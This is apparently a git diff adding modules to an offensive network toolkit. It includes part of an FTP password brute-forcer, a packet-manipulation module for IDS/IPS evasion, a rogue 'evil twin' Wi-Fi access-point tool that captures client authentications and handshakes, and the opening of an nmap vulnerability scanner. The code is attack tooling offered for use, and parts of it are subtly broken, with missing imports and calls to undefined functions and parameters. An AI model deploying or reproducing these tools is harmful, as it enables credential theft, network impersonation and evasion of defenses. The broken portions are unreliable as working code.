for password in self.passwords:
|
||||
if self.shared_data.orchestrator_should_exit:
|
||||
logger.info("Orchestrator exit signal received, stopping bruteforce task addition.")
|
||||
return False, []
|
||||
self.queue.put((adresse_ip, user, password, mac_address, hostname, port))
|
||||
|
||||
success_flag = [False]
|
||||
threads = []
|
||||
thread_count = min(40, max(1, len(self.users) * len(self.passwords)))
|
||||
|
||||
for _ in range(thread_count):
|
||||
t = threading.Thread(target=self.worker, args=(success_flag,), daemon=True)
|
||||
t.start()
|
||||
threads.append(t)
|
||||
|
||||
while not self.queue.empty():
|
||||
if self.shared_data.orchestrator_should_exit:
|
||||
logger.info("Orchestrator exit signal received, stopping bruteforce.")
|
||||
while not self.queue.empty():
|
||||
try:
|
||||
self.queue.get_nowait()
|
||||
self.queue.task_done()
|
||||
except Exception:
|
||||
break
|
||||
break
|
||||
|
||||
self.queue.join()
|
||||
for t in threads:
|
||||
t.join()
|
||||
|
||||
return success_flag[0], self.results
|
||||
|
||||
# ---------- persistence DB ----------
|
||||
def save_results(self):
|
||||
for mac, ip, hostname, user, password, port in self.results:
|
||||
try:
|
||||
self.shared_data.db.insert_cred(
|
||||
service="ftp",
|
||||
mac=mac,
|
||||
ip=ip,
|
||||
hostname=hostname,
|
||||
user=user,
|
||||
password=password,
|
||||
port=port,
|
||||
database=None,
|
||||
extra=None
|
||||
)
|
||||
except Exception as e:
|
||||
if "ON CONFLICT clause does not match" in str(e):
|
||||
self._fallback_upsert_cred(
|
||||
mac=mac, ip=ip, hostname=hostname, user=user,
|
||||
password=password, port=port, database=None
|
||||
)
|
||||
else:
|
||||
logger.error(f"insert_cred failed for {ip} {user}: {e}")
|
||||
self.results = []
|
||||
|
||||
def removeduplicates(self):
|
||||
pass
|
||||
|
||||
|
||||
if __name__ == "__main__":
|
||||
try:
|
||||
sd = SharedData()
|
||||
ftp_bruteforce = FTPBruteforce(sd)
|
||||
logger.info("FTP brute force module ready.")
|
||||
exit(0)
|
||||
except Exception as e:
|
||||
logger.error(f"Error: {e}")
|
||||
exit(1)
|
||||
318
resources/default_config/actions/heimdall_guard.py
Normal file
@@ -0,0 +1,318 @@
|
||||
# Stealth operations module for IDS/IPS evasion and traffic manipulation.a
|
||||
# Saves settings in `/home/bjorn/.settings_bjorn/heimdall_guard_settings.json`.
|
||||
# Automatically loads saved settings if arguments are not provided.
|
||||
# -i, --interface Network interface to use (default: active interface).
|
||||
# -m, --mode Operating mode (timing, random, fragmented, all).
|
||||
# -d, --delay Base delay between operations in seconds (default: 1).
|
||||
# -r, --randomize Randomization factor for timing (default: 0.5).
|
||||
# -o, --output Output directory (default: /home/bjorn/Bjorn/data/output/stealth).
|
||||
|
||||
import os
|
||||
import json
|
||||
import argparse
|
||||
from datetime import datetime
|
||||
import logging
|
||||
import random
|
||||
import time
|
||||
import socket
|
||||
import struct
|
||||
import threading
|
||||
from scapy.all import *
|
||||
from collections import deque
|
||||
|
||||
# Configure logging
|
||||
logging.basicConfig(level=logging.INFO, format='%(asctime)s - %(levelname)s - %(message)s')
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
b_class = "HeimdallGuard"
|
||||
b_module = "heimdall_guard"
|
||||
b_enabled = 0
|
||||
|
||||
# Default settings
|
||||
DEFAULT_OUTPUT_DIR = "/home/bjorn/Bjorn/data/output/stealth"
|
||||
DEFAULT_SETTINGS_DIR = "/home/bjorn/.settings_bjorn"
|
||||
SETTINGS_FILE = os.path.join(DEFAULT_SETTINGS_DIR, "heimdall_guard_settings.json")
|
||||
|
||||
class HeimdallGuard:
|
||||
def __init__(self, interface, mode='all', base_delay=1, random_factor=0.5, output_dir=DEFAULT_OUTPUT_DIR):
|
||||
self.interface = interface
|
||||
self.mode = mode
|
||||
self.base_delay = base_delay
|
||||
self.random_factor = random_factor
|
||||
self.output_dir = output_dir
|
||||
|
||||
self.packet_queue = deque()
|
||||
self.active = False
|
||||
self.lock = threading.Lock()
|
||||
|
||||
# Statistics
|
||||
self.stats = {
|
||||
'packets_processed': 0,
|
||||
'packets_fragmented': 0,
|
||||
'timing_adjustments': 0
|
||||
}
|
||||
|
||||
def initialize_interface(self):
|
||||
"""Configure network interface for stealth operations."""
|
||||
try:
|
||||
# Disable NIC offloading features that might interfere with packet manipulation
|
||||
commands = [
|
||||
f"ethtool -K {self.interface} tso off", # TCP segmentation offload
|
||||
f"ethtool -K {self.interface} gso off", # Generic segmentation offload
|
||||
f"ethtool -K {self.interface} gro off", # Generic receive offload
|
||||
f"ethtool -K {self.interface} lro off" # Large receive offload
|
||||
]
|
||||
|
||||
for cmd in commands:
|
||||
try:
|
||||
subprocess.run(cmd.split(), check=True)
|
||||
except subprocess.CalledProcessError:
|
||||
logging.warning(f"Failed to execute: {cmd}")
|
||||
|
||||
logging.info(f"Interface {self.interface} configured for stealth operations")
|
||||
return True
|
||||
|
||||
except Exception as e:
|
||||
logging.error(f"Failed to initialize interface: {e}")
|
||||
return False
|
||||
|
||||
def calculate_timing(self):
|
||||
"""Calculate timing delays with randomization."""
|
||||
base = self.base_delay
|
||||
variation = self.random_factor * base
|
||||
return max(0, base + random.uniform(-variation, variation))
|
||||
|
||||
def fragment_packet(self, packet, mtu=1500):
|
||||
"""Fragment packets to avoid detection patterns."""
|
||||
try:
|
||||
if IP in packet:
|
||||
# Fragment IP packets
|
||||
frags = []
|
||||
payload = bytes(packet[IP].payload)
|
||||
header_length = len(packet) - len(payload)
|
||||
max_size = mtu - header_length
|
||||
|
||||
# Create fragments
|
||||
offset = 0
|
||||
while offset < len(payload):
|
||||
frag_size = min(max_size, len(payload) - offset)
|
||||
frag_payload = payload[offset:offset + frag_size]
|
||||
|
||||
# Create fragment packet
|
||||
frag = packet.copy()
|
||||
frag[IP].flags = 'MF' if offset + frag_size < len(payload) else 0
|
||||
frag[IP].frag = offset // 8
|
||||
frag[IP].payload = Raw(frag_payload)
|
||||
|
||||
frags.append(frag)
|
||||
offset += frag_size
|
||||
|
||||
return frags
|
||||
return [packet]
|
||||
|
||||
except Exception as e:
|
||||
logging.error(f"Error fragmenting packet: {e}")
|
||||
return [packet]
|
||||
|
||||
def randomize_ttl(self, packet):
|
||||
"""Randomize TTL values to avoid fingerprinting."""
|
||||
if IP in packet:
|
||||
ttl_values = [32, 64, 128, 255] # Common TTL values
|
||||
packet[IP].ttl = random.choice(ttl_values)
|
||||
return packet
|
||||
|
||||
def modify_tcp_options(self, packet):
|
||||
"""Modify TCP options to avoid fingerprinting."""
|
||||
if TCP in packet:
|
||||
# Common window sizes
|
||||
window_sizes = [8192, 16384, 32768, 65535]
|
||||
packet[TCP].window = random.choice(window_sizes)
|
||||
|
||||
# Randomize TCP options
|
||||
tcp_options = []
|
||||
|
||||
# MSS option
|
||||
mss_values = [1400, 1460, 1440]
|
||||
tcp_options.append(('MSS', random.choice(mss_values)))
|
||||
|
||||
# Window scale
|
||||
if random.random() < 0.5:
|
||||
tcp_options.append(('WScale', random.randint(0, 14)))
|
||||
|
||||
# SACK permitted
|
||||
if random.random() < 0.5:
|
||||
tcp_options.append(('SAckOK', ''))
|
||||
|
||||
packet[TCP].options = tcp_options
|
||||
|
||||
return packet
|
||||
|
||||
def process_packet(self, packet):
|
||||
"""Process a packet according to stealth settings."""
|
||||
processed_packets = []
|
||||
|
||||
try:
|
||||
if self.mode in ['all', 'fragmented']:
|
||||
fragments = self.fragment_packet(packet)
|
||||
processed_packets.extend(fragments)
|
||||
self.stats['packets_fragmented'] += len(fragments) - 1
|
||||
else:
|
||||
processed_packets.append(packet)
|
||||
|
||||
# Apply additional stealth techniques
|
||||
final_packets = []
|
||||
for pkt in processed_packets:
|
||||
pkt = self.randomize_ttl(pkt)
|
||||
pkt = self.modify_tcp_options(pkt)
|
||||
final_packets.append(pkt)
|
||||
|
||||
self.stats['packets_processed'] += len(final_packets)
|
||||
return final_packets
|
||||
|
||||
except Exception as e:
|
||||
logging.error(f"Error processing packet: {e}")
|
||||
return [packet]
|
||||
|
||||
def send_packet(self, packet):
|
||||
"""Send packet with timing adjustments."""
|
||||
try:
|
||||
if self.mode in ['all', 'timing']:
|
||||
delay = self.calculate_timing()
|
||||
time.sleep(delay)
|
||||
self.stats['timing_adjustments'] += 1
|
||||
|
||||
send(packet, iface=self.interface, verbose=False)
|
||||
|
||||
except Exception as e:
|
||||
logging.error(f"Error sending packet: {e}")
|
||||
|
||||
def packet_processor_thread(self):
|
||||
"""Process packets from the queue."""
|
||||
while self.active:
|
||||
try:
|
||||
if self.packet_queue:
|
||||
packet = self.packet_queue.popleft()
|
||||
processed_packets = self.process_packet(packet)
|
||||
|
||||
for processed in processed_packets:
|
||||
self.send_packet(processed)
|
||||
else:
|
||||
time.sleep(0.1)
|
||||
|
||||
except Exception as e:
|
||||
logging.error(f"Error in packet processor thread: {e}")
|
||||
|
||||
def start(self):
|
||||
"""Start stealth operations."""
|
||||
if not self.initialize_interface():
|
||||
return False
|
||||
|
||||
self.active = True
|
||||
self.processor_thread = threading.Thread(target=self.packet_processor_thread)
|
||||
self.processor_thread.start()
|
||||
return True
|
||||
|
||||
def stop(self):
|
||||
"""Stop stealth operations."""
|
||||
self.active = False
|
||||
if hasattr(self, 'processor_thread'):
|
||||
self.processor_thread.join()
|
||||
self.save_stats()
|
||||
|
||||
def queue_packet(self, packet):
|
||||
"""Queue a packet for processing."""
|
||||
self.packet_queue.append(packet)
|
||||
|
||||
def save_stats(self):
|
||||
"""Save operation statistics."""
|
||||
try:
|
||||
os.makedirs(self.output_dir, exist_ok=True)
|
||||
timestamp = datetime.now().strftime("%Y-%m-%d_%H-%M-%S")
|
||||
|
||||
stats_file = os.path.join(self.output_dir, f"stealth_stats_{timestamp}.json")
|
||||
|
||||
with open(stats_file, 'w') as f:
|
||||
json.dump({
|
||||
'timestamp': datetime.now().isoformat(),
|
||||
'interface': self.interface,
|
||||
'mode': self.mode,
|
||||
'stats': self.stats
|
||||
}, f, indent=4)
|
||||
|
||||
logging.info(f"Statistics saved to {stats_file}")
|
||||
|
||||
except Exception as e:
|
||||
logging.error(f"Failed to save statistics: {e}")
|
||||
|
||||
def save_settings(interface, mode, base_delay, random_factor, output_dir):
|
||||
"""Save settings to JSON file."""
|
||||
try:
|
||||
os.makedirs(DEFAULT_SETTINGS_DIR, exist_ok=True)
|
||||
settings = {
|
||||
"interface": interface,
|
||||
"mode": mode,
|
||||
"base_delay": base_delay,
|
||||
"random_factor": random_factor,
|
||||
"output_dir": output_dir
|
||||
}
|
||||
with open(SETTINGS_FILE, 'w') as f:
|
||||
json.dump(settings, f)
|
||||
logging.info(f"Settings saved to {SETTINGS_FILE}")
|
||||
except Exception as e:
|
||||
logging.error(f"Failed to save settings: {e}")
|
||||
|
||||
def load_settings():
|
||||
"""Load settings from JSON file."""
|
||||
if os.path.exists(SETTINGS_FILE):
|
||||
try:
|
||||
with open(SETTINGS_FILE, 'r') as f:
|
||||
return json.load(f)
|
||||
except Exception as e:
|
||||
logging.error(f"Failed to load settings: {e}")
|
||||
return {}
|
||||
|
||||
def main():
|
||||
parser = argparse.ArgumentParser(description="Stealth operations module")
|
||||
parser.add_argument("-i", "--interface", help="Network interface to use")
|
||||
parser.add_argument("-m", "--mode", choices=['timing', 'random', 'fragmented', 'all'],
|
||||
default='all', help="Operating mode")
|
||||
parser.add_argument("-d", "--delay", type=float, default=1, help="Base delay between operations")
|
||||
parser.add_argument("-r", "--randomize", type=float, default=0.5, help="Randomization factor")
|
||||
parser.add_argument("-o", "--output", default=DEFAULT_OUTPUT_DIR, help="Output directory")
|
||||
args = parser.parse_args()
|
||||
|
||||
settings = load_settings()
|
||||
interface = args.interface or settings.get("interface")
|
||||
mode = args.mode or settings.get("mode")
|
||||
base_delay = args.delay or settings.get("base_delay")
|
||||
random_factor = args.randomize or settings.get("random_factor")
|
||||
output_dir = args.output or settings.get("output_dir")
|
||||
|
||||
if not interface:
|
||||
interface = conf.iface
|
||||
logging.info(f"Using default interface: {interface}")
|
||||
|
||||
save_settings(interface, mode, base_delay, random_factor, output_dir)
|
||||
|
||||
guard = HeimdallGuard(
|
||||
interface=interface,
|
||||
mode=mode,
|
||||
base_delay=base_delay,
|
||||
random_factor=random_factor,
|
||||
output_dir=output_dir
|
||||
)
|
||||
|
||||
try:
|
||||
if guard.start():
|
||||
logging.info("Heimdall Guard started. Press Ctrl+C to stop.")
|
||||
while True:
|
||||
time.sleep(1)
|
||||
except KeyboardInterrupt:
|
||||
logging.info("Stopping Heimdall Guard...")
|
||||
guard.stop()
|
||||
|
||||
if __name__ == "__main__":
|
||||
main()
|
||||
14
resources/default_config/actions/idle.py
Normal file
@@ -0,0 +1,14 @@
|
||||
from shared import SharedData
|
||||
|
||||
b_class = "IDLE"
|
||||
b_module = "idle"
|
||||
b_status = "IDLE"
|
||||
|
||||
|
||||
class IDLE:
|
||||
def __init__(self, shared_data):
|
||||
self.shared_data = shared_data
|
||||
|
||||
|
||||
|
||||
|
||||
467
resources/default_config/actions/loki_deceiver.py
Normal file
@@ -0,0 +1,467 @@
|
||||
# WiFi deception tool for creating malicious access points and capturing authentications.
|
||||
# Saves settings in `/home/bjorn/.settings_bjorn/loki_deceiver_settings.json`.
|
||||
# Automatically loads saved settings if arguments are not provided.
|
||||
# -i, --interface Wireless interface for AP creation (default: wlan0).
|
||||
# -s, --ssid SSID for the fake access point (or target to clone).
|
||||
# -c, --channel WiFi channel (default: 6).
|
||||
# -p, --password Optional password for WPA2 AP.
|
||||
# -o, --output Output directory (default: /home/bjorn/Bjorn/data/output/wifi).
|
||||
|
||||
import os
|
||||
import json
|
||||
import argparse
|
||||
from datetime import datetime
|
||||
import logging
|
||||
import subprocess
|
||||
import signal
|
||||
import time
|
||||
import threading
|
||||
import scapy.all as scapy
|
||||
from scapy.layers.dot11 import Dot11, Dot11Beacon, Dot11Elt
|
||||
|
||||
|
||||
b_class = "LokiDeceiver"
|
||||
b_module = "loki_deceiver"
|
||||
b_enabled = 0
|
||||
|
||||
# Configure logging
|
||||
logging.basicConfig(level=logging.INFO, format='%(asctime)s - %(levelname)s - %(message)s')
|
||||
|
||||
# Default settings
|
||||
DEFAULT_OUTPUT_DIR = "/home/bjorn/Bjorn/data/output/wifi"
|
||||
DEFAULT_SETTINGS_DIR = "/home/bjorn/.settings_bjorn"
|
||||
SETTINGS_FILE = os.path.join(DEFAULT_SETTINGS_DIR, "loki_deceiver_settings.json")
|
||||
|
||||
class LokiDeceiver:
|
||||
def __init__(self, interface, ssid, channel=6, password=None, output_dir=DEFAULT_OUTPUT_DIR):
|
||||
self.interface = interface
|
||||
self.ssid = ssid
|
||||
self.channel = channel
|
||||
self.password = password
|
||||
self.output_dir = output_dir
|
||||
|
||||
self.original_mac = None
|
||||
self.captured_handshakes = []
|
||||
self.captured_credentials = []
|
||||
self.active = False
|
||||
self.lock = threading.Lock()
|
||||
|
||||
def setup_interface(self):
|
||||
"""Configure wireless interface for AP mode."""
|
||||
try:
|
||||
# Kill potentially interfering processes
|
||||
subprocess.run(['sudo', 'airmon-ng', 'check', 'kill'],
|
||||
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
|
||||
|
||||
# Stop NetworkManager
|
||||
subprocess.run(['sudo', 'systemctl', 'stop', 'NetworkManager'],
|
||||
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
|
||||
|
||||
# Save original MAC
|
||||
self.original_mac = self.get_interface_mac()
|
||||
|
||||
# Enable monitor mode
|
||||
subprocess.run(['sudo', 'ip', 'link', 'set', self.interface, 'down'],
|
||||
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
|
||||
subprocess.run(['sudo', 'iw', self.interface, 'set', 'monitor', 'none'],
|
||||
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
|
||||
subprocess.run(['sudo', 'ip', 'link', 'set', self.interface, 'up'],
|
||||
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
|
||||
|
||||
logging.info(f"Interface {self.interface} configured in monitor mode")
|
||||
return True
|
||||
|
||||
except Exception as e:
|
||||
logging.error(f"Failed to setup interface: {e}")
|
||||
return False
|
||||
|
||||
def get_interface_mac(self):
|
||||
"""Get the MAC address of the wireless interface."""
|
||||
try:
|
||||
result = subprocess.run(['ip', 'link', 'show', self.interface],
|
||||
stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True)
|
||||
if result.returncode == 0:
|
||||
mac = re.search(r'link/ether ([0-9a-f:]{17})', result.stdout)
|
||||
if mac:
|
||||
return mac.group(1)
|
||||
except Exception as e:
|
||||
logging.error(f"Failed to get interface MAC: {e}")
|
||||
return None
|
||||
|
||||
def create_ap_config(self):
|
||||
"""Create configuration for hostapd."""
|
||||
try:
|
||||
config = [
|
||||
'interface=' + self.interface,
|
||||
'driver=nl80211',
|
||||
'ssid=' + self.ssid,
|
||||
'hw_mode=g',
|
||||
'channel=' + str(self.channel),
|
||||
'macaddr_acl=0',
|
||||
'ignore_broadcast_ssid=0'
|
||||
]
|
||||
|
||||
if self.password:
|
||||
config.extend([
|
||||
'auth_algs=1',
|
||||
'wpa=2',
|
||||
'wpa_passphrase=' + self.password,
|
||||
'wpa_key_mgmt=WPA-PSK',
|
||||
'wpa_pairwise=CCMP',
|
||||
'rsn_pairwise=CCMP'
|
||||
])
|
||||
|
||||
config_path = '/tmp/hostapd.conf'
|
||||
with open(config_path, 'w') as f:
|
||||
f.write('\n'.join(config))
|
||||
|
||||
return config_path
|
||||
|
||||
except Exception as e:
|
||||
logging.error(f"Failed to create AP config: {e}")
|
||||
return None
|
||||
|
||||
def setup_dhcp(self):
|
||||
"""Configure DHCP server using dnsmasq."""
|
||||
try:
|
||||
config = [
|
||||
'interface=' + self.interface,
|
||||
'dhcp-range=192.168.1.2,192.168.1.30,255.255.255.0,12h',
|
||||
'dhcp-option=3,192.168.1.1',
|
||||
'dhcp-option=6,192.168.1.1',
|
||||
'server=8.8.8.8',
|
||||
'log-queries',
|
||||
'log-dhcp'
|
||||
]
|
||||
|
||||
config_path = '/tmp/dnsmasq.conf'
|
||||
with open(config_path, 'w') as f:
|
||||
f.write('\n'.join(config))
|
||||
|
||||
# Configure interface IP
|
||||
subprocess.run(['sudo', 'ifconfig', self.interface, '192.168.1.1', 'netmask', '255.255.255.0'],
|
||||
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
|
||||
|
||||
return config_path
|
||||
|
||||
except Exception as e:
|
||||
logging.error(f"Failed to setup DHCP: {e}")
|
||||
return None
|
||||
|
||||
def start_ap(self):
|
||||
"""Start the fake access point."""
|
||||
try:
|
||||
if not self.setup_interface():
|
||||
return False
|
||||
|
||||
hostapd_config = self.create_ap_config()
|
||||
dhcp_config = self.setup_dhcp()
|
||||
|
||||
if not hostapd_config or not dhcp_config:
|
||||
return False
|
||||
|
||||
# Start hostapd
|
||||
self.hostapd_process = subprocess.Popen(
|
||||
['sudo', 'hostapd', hostapd_config],
|
||||
stdout=subprocess.PIPE,
|
||||
stderr=subprocess.PIPE
|
||||
)
|
||||
|
||||
# Start dnsmasq
|
||||
self.dnsmasq_process = subprocess.Popen(
|
||||
['sudo', 'dnsmasq', '-C', dhcp_config],
|
||||
stdout=subprocess.PIPE,
|
||||
stderr=subprocess.PIPE
|
||||
)
|
||||
|
||||
self.active = True
|
||||
logging.info(f"Access point {self.ssid} started on channel {self.channel}")
|
||||
|
||||
# Start packet capture
|
||||
self.start_capture()
|
||||
|
||||
return True
|
||||
|
||||
except Exception as e:
|
||||
logging.error(f"Failed to start AP: {e}")
|
||||
return False
|
||||
|
||||
def start_capture(self):
|
||||
"""Start capturing wireless traffic."""
|
||||
try:
|
||||
# Start tcpdump for capturing handshakes
|
||||
handshake_path = os.path.join(self.output_dir, 'handshakes')
|
||||
os.makedirs(handshake_path, exist_ok=True)
|
||||
|
||||
timestamp = datetime.now().strftime("%Y-%m-%d_%H-%M-%S")
|
||||
pcap_file = os.path.join(handshake_path, f"capture_{timestamp}.pcap")
|
||||
|
||||
self.tcpdump_process = subprocess.Popen(
|
||||
['sudo', 'tcpdump', '-i', self.interface, '-w', pcap_file],
|
||||
stdout=subprocess.PIPE,
|
||||
stderr=subprocess.PIPE
|
||||
)
|
||||
|
||||
# Start sniffing in a separate thread
|
||||
self.sniffer_thread = threading.Thread(target=self.packet_sniffer)
|
||||
self.sniffer_thread.start()
|
||||
|
||||
except Exception as e:
|
||||
logging.error(f"Failed to start capture: {e}")
|
||||
|
||||
def packet_sniffer(self):
|
||||
"""Sniff and process packets."""
|
||||
try:
|
||||
scapy.sniff(iface=self.interface, prn=self.process_packet, store=0,
|
||||
stop_filter=lambda p: not self.active)
|
||||
except Exception as e:
|
||||
logging.error(f"Sniffer error: {e}")
|
||||
|
||||
def process_packet(self, packet):
|
||||
"""Process captured packets."""
|
||||
try:
|
||||
if packet.haslayer(Dot11):
|
||||
# Process authentication attempts
|
||||
if packet.type == 0 and packet.subtype == 11: # Authentication
|
||||
self.process_auth(packet)
|
||||
|
||||
# Process association requests
|
||||
elif packet.type == 0 and packet.subtype == 0: # Association request
|
||||
self.process_assoc(packet)
|
||||
|
||||
# Process EAPOL packets for handshakes
|
||||
elif packet.haslayer(EAPOL):
|
||||
self.process_handshake(packet)
|
||||
|
||||
except Exception as e:
|
||||
logging.error(f"Error processing packet: {e}")
|
||||
|
||||
def process_auth(self, packet):
|
||||
"""Process authentication packets."""
|
||||
try:
|
||||
if packet.addr2: # Source MAC
|
||||
with self.lock:
|
||||
self.captured_credentials.append({
|
||||
'type': 'auth',
|
||||
'mac': packet.addr2,
|
||||
'timestamp': datetime.now().isoformat()
|
||||
})
|
||||
except Exception as e:
|
||||
logging.error(f"Error processing auth packet: {e}")
|
||||
|
||||
def process_assoc(self, packet):
|
||||
"""Process association packets."""
|
||||
try:
|
||||
if packet.addr2: # Source MAC
|
||||
with self.lock:
|
||||
self.captured_credentials.append({
|
||||
'type': 'assoc',
|
||||
'mac': packet.addr2,
|
||||
'timestamp': datetime.now().isoformat()
|
||||
})
|
||||
except Exception as e:
|
||||
logging.error(f"Error processing assoc packet: {e}")
|
||||
|
||||
def process_handshake(self, packet):
|
||||
"""Process EAPOL packets for handshakes."""
|
||||
try:
|
||||
if packet.addr2: # Source MAC
|
||||
with self.lock:
|
||||
self.captured_handshakes.append({
|
||||
'mac': packet.addr2,
|
||||
'timestamp': datetime.now().isoformat()
|
||||
})
|
||||
except Exception as e:
|
||||
logging.error(f"Error processing handshake packet: {e}")
|
||||
|
||||
def save_results(self):
|
||||
"""Save captured data to JSON files."""
|
||||
try:
|
||||
os.makedirs(self.output_dir, exist_ok=True)
|
||||
timestamp = datetime.now().strftime("%Y-%m-%d_%H-%M-%S")
|
||||
|
||||
results = {
|
||||
'ap_info': {
|
||||
'ssid': self.ssid,
|
||||
'channel': self.channel,
|
||||
'interface': self.interface
|
||||
},
|
||||
'credentials': self.captured_credentials,
|
||||
'handshakes': self.captured_handshakes
|
||||
}
|
||||
|
||||
output_file = os.path.join(self.output_dir, f"results_{timestamp}.json")
|
||||
with open(output_file, 'w') as f:
|
||||
json.dump(results, f, indent=4)
|
||||
|
||||
logging.info(f"Results saved to {output_file}")
|
||||
|
||||
except Exception as e:
|
||||
logging.error(f"Failed to save results: {e}")
|
||||
|
||||
def cleanup(self):
|
||||
"""Clean up resources and restore interface."""
|
||||
try:
|
||||
self.active = False
|
||||
|
||||
# Stop processes
|
||||
for process in [self.hostapd_process, self.dnsmasq_process, self.tcpdump_process]:
|
||||
if process:
|
||||
process.terminate()
|
||||
process.wait()
|
||||
|
||||
# Restore interface
|
||||
if self.original_mac:
|
||||
subprocess.run(['sudo', 'ip', 'link', 'set', self.interface, 'down'],
|
||||
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
|
||||
subprocess.run(['sudo', 'iw', self.interface, 'set', 'type', 'managed'],
|
||||
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
|
||||
subprocess.run(['sudo', 'ip', 'link', 'set', self.interface, 'up'],
|
||||
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
|
||||
|
||||
# Restart NetworkManager
|
||||
subprocess.run(['sudo', 'systemctl', 'start', 'NetworkManager'],
|
||||
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
|
||||
|
||||
logging.info("Cleanup completed")
|
||||
|
||||
except Exception as e:
|
||||
logging.error(f"Error during cleanup: {e}")
|
||||
|
||||
def save_settings(interface, ssid, channel, password, output_dir):
|
||||
"""Save settings to JSON file."""
|
||||
try:
|
||||
os.makedirs(DEFAULT_SETTINGS_DIR, exist_ok=True)
|
||||
settings = {
|
||||
"interface": interface,
|
||||
"ssid": ssid,
|
||||
"channel": channel,
|
||||
"password": password,
|
||||
"output_dir": output_dir
|
||||
}
|
||||
with open(SETTINGS_FILE, 'w') as f:
|
||||
json.dump(settings, f)
|
||||
logging.info(f"Settings saved to {SETTINGS_FILE}")
|
||||
except Exception as e:
|
||||
logging.error(f"Failed to save settings: {e}")
|
||||
|
||||
def load_settings():
|
||||
"""Load settings from JSON file."""
|
||||
if os.path.exists(SETTINGS_FILE):
|
||||
try:
|
||||
with open(SETTINGS_FILE, 'r') as f:
|
||||
return json.load(f)
|
||||
except Exception as e:
|
||||
logging.error(f"Failed to load settings: {e}")
|
||||
return {}
|
||||
|
||||
def main():
|
||||
parser = argparse.ArgumentParser(description="WiFi deception tool")
|
||||
parser.add_argument("-i", "--interface", default="wlan0", help="Wireless interface")
|
||||
parser.add_argument("-s", "--ssid", help="SSID for fake AP")
|
||||
parser.add_argument("-c", "--channel", type=int, default=6, help="WiFi channel")
|
||||
parser.add_argument("-p", "--password", help="WPA2 password")
|
||||
parser.add_argument("-o", "--output", default=DEFAULT_OUTPUT_DIR, help="Output directory")
|
||||
|
||||
# Honeypot options
|
||||
parser.add_argument("--captive-portal", action="store_true", help="Enable captive portal")
|
||||
parser.add_argument("--clone-ap", help="SSID to clone and impersonate")
|
||||
parser.add_argument("--karma", action="store_true", help="Enable Karma attack mode")
|
||||
|
||||
# Advanced options
|
||||
parser.add_argument("--beacon-interval", type=int, default=100, help="Beacon interval in ms")
|
||||
parser.add_argument("--max-clients", type=int, default=10, help="Maximum number of clients")
|
||||
parser.add_argument("--timeout", type=int, help="Runtime duration in seconds")
|
||||
|
||||
args = parser.parse_args()
|
||||
|
||||
settings = load_settings()
|
||||
interface = args.interface or settings.get("interface")
|
||||
ssid = args.ssid or settings.get("ssid")
|
||||
channel = args.channel or settings.get("channel")
|
||||
password = args.password or settings.get("password")
|
||||
output_dir = args.output or settings.get("output_dir")
|
||||
|
||||
# Load advanced settings
|
||||
captive_portal = args.captive_portal or settings.get("captive_portal", False)
|
||||
clone_ap = args.clone_ap or settings.get("clone_ap")
|
||||
karma = args.karma or settings.get("karma", False)
|
||||
beacon_interval = args.beacon_interval or settings.get("beacon_interval", 100)
|
||||
max_clients = args.max_clients or settings.get("max_clients", 10)
|
||||
timeout = args.timeout or settings.get("timeout")
|
||||
|
||||
if not interface:
|
||||
logging.error("Interface is required. Use -i or save it in settings")
|
||||
return
|
||||
|
||||
# Clone AP if requested
|
||||
if clone_ap:
|
||||
logging.info(f"Attempting to clone AP: {clone_ap}")
|
||||
clone_info = scan_for_ap(interface, clone_ap)
|
||||
if clone_info:
|
||||
ssid = clone_info['ssid']
|
||||
channel = clone_info['channel']
|
||||
logging.info(f"Successfully cloned AP settings: {ssid} on channel {channel}")
|
||||
else:
|
||||
logging.error(f"Failed to find AP to clone: {clone_ap}")
|
||||
return
|
||||
|
||||
# Save all settings
|
||||
save_settings(
|
||||
interface=interface,
|
||||
ssid=ssid,
|
||||
channel=channel,
|
||||
password=password,
|
||||
output_dir=output_dir,
|
||||
captive_portal=captive_portal,
|
||||
clone_ap=clone_ap,
|
||||
karma=karma,
|
||||
beacon_interval=beacon_interval,
|
||||
max_clients=max_clients,
|
||||
timeout=timeout
|
||||
)
|
||||
|
||||
# Create and configure deceiver
|
||||
deceiver = LokiDeceiver(
|
||||
interface=interface,
|
||||
ssid=ssid,
|
||||
channel=channel,
|
||||
password=password,
|
||||
output_dir=output_dir,
|
||||
captive_portal=captive_portal,
|
||||
karma=karma,
|
||||
beacon_interval=beacon_interval,
|
||||
max_clients=max_clients
|
||||
)
|
||||
|
||||
try:
|
||||
# Start the deception
|
||||
if deceiver.start():
|
||||
logging.info(f"Access point {ssid} started on channel {channel}")
|
||||
|
||||
if timeout:
|
||||
logging.info(f"Running for {timeout} seconds")
|
||||
time.sleep(timeout)
|
||||
deceiver.stop()
|
||||
else:
|
||||
logging.info("Press Ctrl+C to stop")
|
||||
while True:
|
||||
time.sleep(1)
|
||||
|
||||
except KeyboardInterrupt:
|
||||
logging.info("Stopping Loki Deceiver...")
|
||||
except Exception as e:
|
||||
logging.error(f"Unexpected error: {e}")
|
||||
finally:
|
||||
deceiver.stop()
|
||||
logging.info("Cleanup completed")
|
||||
|
||||
if __name__ == "__main__":
|
||||
# Set process niceness to high priority
|
||||
try:
|
||||
os.nice(-10)
|
||||
except:
|
||||
logging.warning("Failed to set process priority. Running with default priority.")
|
||||
|
||||
# Start main function
|
||||
main()
|
||||
423
resources/default_config/actions/nmap_vuln_scanner.py
Normal file
@@ -0,0 +1,423 @@
|
||||
# actions/NmapVulnScanner.py
|
||||
"""
|
||||
Vulnerability Scanner Action
|
||||
Scanne ultra-rapidement CPE (+ CVE via vulners si dispo),
|
||||
avec fallback "lourd" optionnel.
|
||||
"""
|
||||
|
||||
import nmap
|
||||
import json
|
||||
import logging
|
||||
from typing import Dict, List, Set, Any, Optional
|
||||
from datetime import datetime, timedelta
|
||||
|
||||
from shared import SharedData
|
||||
from logger import Logger
|
||||
|
||||
logger = Logger(name="NmapVulnScanner.py", level=logging.DEBUG)
|
||||
|
||||
